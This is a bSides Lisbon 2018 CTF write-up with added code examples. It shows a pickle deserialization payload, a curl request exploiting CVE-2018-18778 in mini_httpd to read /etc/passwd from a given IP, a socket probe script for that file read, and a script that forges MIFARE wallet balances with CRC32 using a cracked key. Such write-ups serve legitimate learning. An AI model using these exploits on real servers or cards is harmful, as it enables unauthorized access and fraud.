bSides Lisbon Capture The Flag Write-up

Tiago Mendo
Probely
Dec 5, 2018

Just like last year, we participated in the bSides Lisbon Capture The Flag security competition that took place a few days ago. The conference itself was excellent, with a diverse and very interesting presentation schedule.

bSides Lisbon was a two-day event, with the Capture The Flag (CTF) competition taking place on the first day, in parallel with the workshops. This year teams were limited to 4 members, but the number of teams was the same, 10. Participation in the CTF was restricted to teams that completed the qualifier challenges and finished in the top 10.

We had won the last two CTFs, so we decided to apply the same recipe as last year, with Cláudio Gamboa again on our team.

3.5 hours later, this is how our dashboard looked:

Some of those 100s were more like a 1000 :)

Challenges in black are the ones not solved (by our team), and the ones that nobody solved will likely show up in next year's qualifiers, with some twist. Please note that not all challenges are shown in this image.

We will only explain the challenges we solved, but we have to recognize the organization's effort to include very recent vulnerabilities, like Pwnable 100, which was based on CVE-2018-10933, the libssh authentication bypass in which the client sends SSH2_MSG_USERAUTH_SUCCESS instead of SSH2_MSG_USERAUTH_REQUEST and the server treats it as already authenticated.

Trivia

Router (100)

My router is high on drugs.

The answer was KRACK, the vanity name of the key reinstallation attack against WPA2.

Bug (200)

What's the vulnerability?

We were given a file whose contents were:

Trivia 200 challenge

We (one of us) immediately recognized this as a serialized Python object, so we made a wild guess that it was related to the Python pickle library, which shows up frequently in CTFs. After a few attempts, we found the right answer: deserialization.
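Why "deserialization" is the answer, as an added example that is not part of the original write-up: a pickle stream can name any importable callable and ask the unpickler to call it, so loading untrusted pickle data is code execution. The script below builds such a payload (using os.getcwd as a harmless stand-in for what an attacker would really name, such as os.system), shows how to triage a pickle stream without loading it, and shows the allow-list Unpickler from the pickle module documentation refusing it. The class and function names are this example's own.

```python
import io
import os
import pickle
import pickletools


class Payload:
    """Constructed demo payload. __reduce__ tells the unpickler which callable
    to invoke on load; a real payload would name os.system or subprocess.Popen.
    os.getcwd is used here so the script is harmless to run."""

    def __reduce__(self):
        return (os.getcwd, ())


def build_payload() -> bytes:
    """Serialize the payload: the stream now carries a global reference to
    os.getcwd (GLOBAL / STACK_GLOBAL) followed by a REDUCE opcode."""
    return pickle.dumps(Payload(), protocol=4)


def build_benign() -> bytes:
    """A pickle of plain data, for comparison: no code-executing opcodes."""
    return pickle.dumps({"balance": 10000, "elite": False}, protocol=4)


# Opcodes that can resolve or call Python objects during unpickling.
DANGEROUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
             "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def risky_opcodes(data: bytes) -> set:
    """Triage a pickle stream without loading it: pickletools.genops only
    parses the opcode stream, so listing the dangerous opcodes is safe."""
    return {op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in DANGEROUS}


def unsafe_load(data: bytes):
    """The vulnerable pattern: pickle.loads() resolves the global and calls it."""
    return pickle.loads(data)


def payload_executed(data: bytes) -> bool:
    """True when loading the stream actually ran os.getcwd()."""
    return unsafe_load(data) == os.getcwd()


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list find_class (the mitigation from the pickle docs): any global
    not listed is refused before REDUCE gets a chance to call it."""

    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"),
               ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_load_rejects(data: bytes) -> bool:
    """True when the restricted unpickler refuses the stream."""
    try:
        RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    blob = build_payload()
    print("opcode triage :", sorted(risky_opcodes(blob)))
    print("unsafe load ran the callable:", payload_executed(blob))
    print("restricted load refused it  :", safe_load_rejects(blob))
    print("benign pickle risky opcodes :", risky_opcodes(build_benign()))
```

The opcode triage is the part worth remembering for a CTF: pickletools.dis or genops lets you read what a suspicious blob would do before you ever call pickle.loads on it.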

Say My Name (300)

What's rfp's real name?

After submitting at least one "Request For Proposal" attempt (a leftover from a corporate past), we started googling for rfp in the hope that something would show up. Rain Forest Puppy quickly showed up, which rang a bell. Another Google search and we had the answer: Jeff Forristal.

Web

Site (100)

We found bSidesLisbon 2018 development server at http://37.252.121.198:8080/
For some reason the site was not rendering.

When accessing the given URL, you would be presented with a 404 error page:

Following the URL at the bottom of that page, you could see that version 1.30 (one release after the one being used) fixed a CVE that let remote users read arbitrary files:

New in version 1.30:

Enlarge request read buffer.
Fix security bug that let remote users read arbitrary files. (HuJin@topsec alpha_lab as CVE-2018-18778)

Reading about the CVE (a bug in ACME mini_httpd 1.29, which the flag also hints at) you could see that you only needed to blank out the Host header and the server would hand back any file on the filesystem, thus getting the flag. One caveat on the curl syntax: -H "Host: " with nothing after the colon makes curl drop the Host header altogether rather than send an empty one; if a target needs a literally empty value, curl's spelling for that is -H "Host;". The request as shown worked against the challenge server:

$ curl -H "Host: " http://37.252.121.198:8080/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-timesquare:x:100:103:flag{such_mini_code_much_critical_exploit},,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
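Since curl hides the difference between a missing and an empty Host header, here is the same probe written at the socket level, as an added example that is not part of the original write-up: it builds the raw request bytes for either variant, and classifies the reply by counting lines that look like passwd entries. The sample response embedded in it is constructed for the example, not captured from the challenge server, and probe() is only needed against a live target.

```python
import re
import socket
from typing import Optional, Tuple

# One /etc/passwd entry: name:password:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(
    rb"^[a-z_][a-z0-9_-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M)

# Constructed sample reply, shaped like a successful file read (not a capture).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: example\r\n"
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
)


def build_request(path: str, host: Optional[str]) -> bytes:
    """Raw HTTP/1.1 request bytes.

    host=None -> no Host header at all (what curl sends for -H "Host:" or
                 -H "Host: ", both of which remove the header).
    host=""   -> a literally empty "Host:" header (curl spelling: -H "Host;").
    """
    lines = [f"GET {path} HTTP/1.1"]
    if host is not None:
        lines.append(f"Host: {host}".rstrip())
    lines += ["User-Agent: probe/0.1", "Connection: close", "", ""]
    return "\r\n".join(lines).encode("ascii")


def split_response(raw: bytes) -> Tuple[int, bytes]:
    """Return (status code, body) from a raw HTTP response."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    return int(status_line.split(b" ")[1]), body


def passwd_lines(body: bytes) -> int:
    """Number of body lines shaped like passwd entries; > 0 means the read worked."""
    return len(PASSWD_LINE.findall(body))


def probe(host: str, port: int, path: str = "/etc/passwd",
          host_header: Optional[str] = "") -> Tuple[int, int]:
    """Send the request to a live target and return (status, passwd-like lines)."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(build_request(path, host_header))
        chunks = []
        while True:
            chunk = s.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    status, body = split_response(b"".join(chunks))
    return status, passwd_lines(body)


if __name__ == "__main__":
    print(build_request("/etc/passwd", "").decode(), end="")
    status, body = split_response(SAMPLE_RESPONSE)
    print(status, "passwd-like lines:", passwd_lines(body))
```

Trying both host_header=None and host_header="" against a target tells you which of the two conditions the server actually mishandles, something a single curl invocation cannot distinguish.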

Physical

Baby No Hertz Me (100)

There is a rumor of a number station out there.
Note: 2 teams can be solving this in parallel.

On this first physical challenge we didn't receive any instructions, only a radio. After some careful tuning (to 107.70 FM), you would hear some music and then a long run of numbers. We had to listen to it 3 times to make sure we had the right sequence, which was:

90109120104905111611497874910297696612288504965907057121817182112984957122975010811598727857

It looked like a decimal ASCII representation, so we split it into:

90 109 120 104 90 51 116 114 97 87 49 102 97 69 66 122 88 50 49 65 90 70 57 121 81 71 82 112 98 49 57 122 97 50 108 115 98 72 78 57

This decoded to ZmxhZ3traW1faEBzX21AZF9yQGRpb19za2lsbHN9, which is the base64 encoding of flag{kim_h@s_m@d_r@dio_skills}.
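The split above was done by eye; as an added example that is not part of the original write-up, here is the general procedure for a separator-less decimal ASCII stream: backtrack over 1-, 2- and 3-digit codes within the printable range, turn each complete segmentation into text, and keep the ones that are valid base64 and decode to something containing "flag{". With the 32..126 range the split is in fact unambiguous (a code starting with 1 must be three digits, one starting with 3..9 must be two), but the search also handles alphabets where it is not. The function names are this example's own.

```python
import base64
import binascii
import re
from typing import Iterator, List, Tuple

# The digit sequence transcribed from the radio, as given in the write-up.
DIGITS = ("9010912010490511161149787491029769661228850496590705712181718211"
          "298495712297" "5010811598727857")


def segmentations(digits: str, lo: int = 32, hi: int = 126) -> Iterator[List[int]]:
    """Yield every way to cut a digit string into decimal codes within [lo, hi].

    Codes may be 1, 2 or 3 digits long and the stream has no separators, so
    this backtracks over all widths rather than assuming a fixed width.
    """
    def rec(i: int, acc: List[int]) -> Iterator[List[int]]:
        if i == len(digits):
            yield list(acc)
            return
        for width in (1, 2, 3):
            chunk = digits[i:i + width]
            if len(chunk) < width or chunk[0] == "0":  # no leading zeros
                continue
            code = int(chunk)
            if lo <= code <= hi:
                acc.append(code)
                yield from rec(i + width, acc)
                acc.pop()
    yield from rec(0, [])


B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def decode_candidates(digits: str) -> Iterator[Tuple[str, bytes]]:
    """For each segmentation, build the text and try it as base64."""
    for codes in segmentations(digits):
        text = "".join(chr(c) for c in codes)
        if len(text) % 4 or not B64.fullmatch(text):
            continue
        try:
            yield text, base64.b64decode(text, validate=True)
        except binascii.Error:
            continue


def solve(digits: str = DIGITS) -> Tuple[str, str]:
    """Return (base64 text, decoded flag) for the first candidate holding 'flag{'."""
    for text, plain in decode_candidates(digits):
        if b"flag{" in plain:
            return text, plain.decode("ascii")
    raise ValueError("no segmentation decodes to a flag")


if __name__ == "__main__":
    b64_text, flag = solve()
    print(b64_text)
    print(flag)
```

Restricting the code range to what the puzzle can plausibly contain (printable ASCII here) is what keeps the search small; widening it to 0..255 would let it also handle raw byte streams, at the cost of many more candidate splits to filter.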

This was the final ranking: we finished third, with xSTF winning, followed by Mutiny. Congrats to the xSTF and Mutiny teams!

Once again, the bSides Lisbon team gave us a great CTF, with well-designed challenges that forced us to think and learn. And because they explain how the challenges can be solved in the conference's closing session, there is an extra chance to learn.

Obrigado bSides Lisbon!

PS: on the second day of the event we were told there was an "unhackable" wallet at the event:

With our event access card we could check if we were ELITE, but every time we checked we would lose 500 bslxCoins (all participants started with 10000).

Using the MIFARE Classic Tool on an Android phone we tried to read the card, and got 3 sectors easily:

Data on the first read (left) and after checking one time if we are elite (right)

From this comparison we can see that only sector 1 changed after using the card. We can see the initial 10000 coins and the resulting 9500, and below the value some gibberish that also changed. Using a proper diff tool, we can see exactly what changed:

We can see the ASCII representation of the value changing in block 1, and something that looks like some kind of hash in block 2.

Since it was a short, 4-byte value, we thought of CRC32 right away, and checked whether it matched the balances we saw. It did :)

So, because there were a few hints about being ELITE, we guessed that we had to change our balance to 31337. We calculated the matching CRC32 for that value (2cf3179) and wrote both to the card, after cracking the sector's write key (it was 010203040506).
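The write-up does not say which bytes the wallet fed to CRC32 (just the ASCII digits, or the whole 16-byte MIFARE block with its padding), and a practitioner hitting the same card would have to find out before forging a block. As an added example, not the authors' tooling, the script below computes CRC32 over the usual candidate layouts of a balance, reports which of them reproduces an observed checksum, and builds the value block plus the CRC bytes in both byte orders. The layout names and the assumption that 2cf3179 is 0x02cf3179 zero-padded to 32 bits are this example's own.

```python
import struct
import zlib


def layouts(value: int) -> dict:
    """Candidate byte layouts a wallet might hash for a balance. Which one the
    bSides card used is not stated in the write-up; find_layouts() tells you."""
    ascii_digits = str(value).encode("ascii")
    return {
        "ascii": ascii_digits,                        # just the digits
        "ascii_nul16": ascii_digits.ljust(16, b"\x00"),  # full MIFARE block, NUL padded
        "ascii_space16": ascii_digits.ljust(16, b" "),   # full block, space padded
        "ascii_ff16": ascii_digits.ljust(16, b"\xff"),   # full block, 0xFF padded
        "uint32_le": struct.pack("<I", value),        # raw integer, little-endian
        "uint32_be": struct.pack(">I", value),        # raw integer, big-endian
    }


def crc32_hex(data: bytes) -> str:
    """CRC-32 (the zlib / IEEE 802.3 polynomial) as 8 lowercase hex digits."""
    return f"{zlib.crc32(data) & 0xFFFFFFFF:08x}"


def find_layouts(value: int, observed_crc_hex: str) -> list:
    """Names of the layouts whose CRC32 equals the checksum read from the card."""
    target = int(observed_crc_hex, 16)
    return [name for name, data in layouts(value).items()
            if zlib.crc32(data) & 0xFFFFFFFF == target]


def forge(value: int, layout: str) -> tuple:
    """Build the 16-byte value block for `value` plus its CRC32 in both byte
    orders, since the dump did not show which order the card stores it in."""
    data = layouts(value)[layout]
    crc = zlib.crc32(data) & 0xFFFFFFFF
    block = data.ljust(16, b"\x00")[:16]
    return block, struct.pack("<I", crc), struct.pack(">I", crc)


if __name__ == "__main__":
    # Assumption: the write-up's 2cf3179 is 0x02cf3179 once padded to 32 bits.
    observed = "02cf3179"
    print("layouts matching", observed, "for 31337:", find_layouts(31337, observed))
    block, crc_le, crc_be = forge(31337, "ascii")
    print("value block:", block.hex())
    print("crc LE:", crc_le.hex(), " crc BE:", crc_be.hex())
```

Run find_layouts() first with the 10000 / 9500 pairs you can read straight off the card; once one layout matches both, forge() gives you the two blocks to write with the recovered key.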

And then went to check our wallet:

Yay, we are ELITE.

This was a really cool side challenge, props again to the bSides Lisbon team.
